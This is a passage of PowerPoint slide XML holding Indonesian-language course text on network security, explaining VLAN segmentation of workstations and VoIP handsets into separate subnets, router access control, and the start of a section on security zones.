              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh VLAN pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh subnet IP pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada diagram di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyegmentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation (VLAN32) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> handset Voice over Internet Protocol (VoIP) (VLAN40). VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua subnet: 10.1.32.0/24 dan 10.1.40.0/24.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Handset VoIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP 10.1.40.100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP 10.1.32.100. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> switch. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. ID dan subnet VLAN yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation dan VoIP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13749075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a:t>Zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Fitur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di zona Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
